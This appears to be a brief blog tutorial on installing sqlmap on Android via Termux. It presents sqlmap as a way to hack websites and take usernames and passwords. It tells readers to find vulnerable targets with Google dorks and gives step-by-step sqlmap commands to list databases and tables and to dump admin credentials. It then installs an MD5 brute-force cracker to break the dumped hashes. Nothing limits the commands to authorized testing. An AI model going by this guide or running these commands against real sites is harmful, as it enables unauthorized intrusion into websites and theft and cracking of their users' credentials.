Welcome back again to another tutorial today .
Today we are going to look on how to install SQLMAP on termux using Android
INTRODUCTION:
SQLMAP is a hacking tool used to hack website and gain control of the website such as getting usernames and passwords so let get started.
TO INSTALL THIS TOOL YOU WILL NEED:
INTERNET CONNECTION
AND A WEBSITE YOU WANT TO HACK
TO FIND VULNERABLE WEBSITE YOU CAN CHECK OUT GOOGLE DORKS
COPY FOLLOWING COMMANDS TO INSTALL THIS AMAZING TOOL ON YOUR SMARTPHONE
STEP 1: updating your repository
# apt update && apt upgrade
STEP 2: INSTALLING REQUIRED PROGRAMS
# pkg install git
STEP 3: CLONING INTO THE REPOSITORY
# git clone https://github.com/sqlmapproject/sqlmap
STEP4: CHANGING INTO THE DIRECTORY
# cd sqlmap
# chmod +x sqlmap.py
# python2 sqlmap.py "
STEP 5: USAGE GUIDE
# python2 sqlmap.py -u <your website> --dbs
To view tables in the website such as ;I'd,username,admin
# python2 sqlmap.py -u <your website> –D Database –tables
TO DUMB USERNAME AND PASSWORDS
# python2 sqlmap.py -u <your website> -D Database -T admin -C username, password --dump
TO INSTALL A PASSWORD HASH BRUTE FORCE TOOL USE THE FOLLOWING COMMAND
# pkg install git python python2 figlet php unzip php curl clang
# git clone https://github.com/sefasaid/python-md5-bruteforce
# cd python-md5-bruteforce
# chmod +x md5-bruteforce.py
# python2 md5-bruteforce.py
SO I HOPE THIS ARTICLE HAS HELPED YOU A LOT IF IT DOES COMMENT BELOW
THANKS FOR READING :)
0 Comments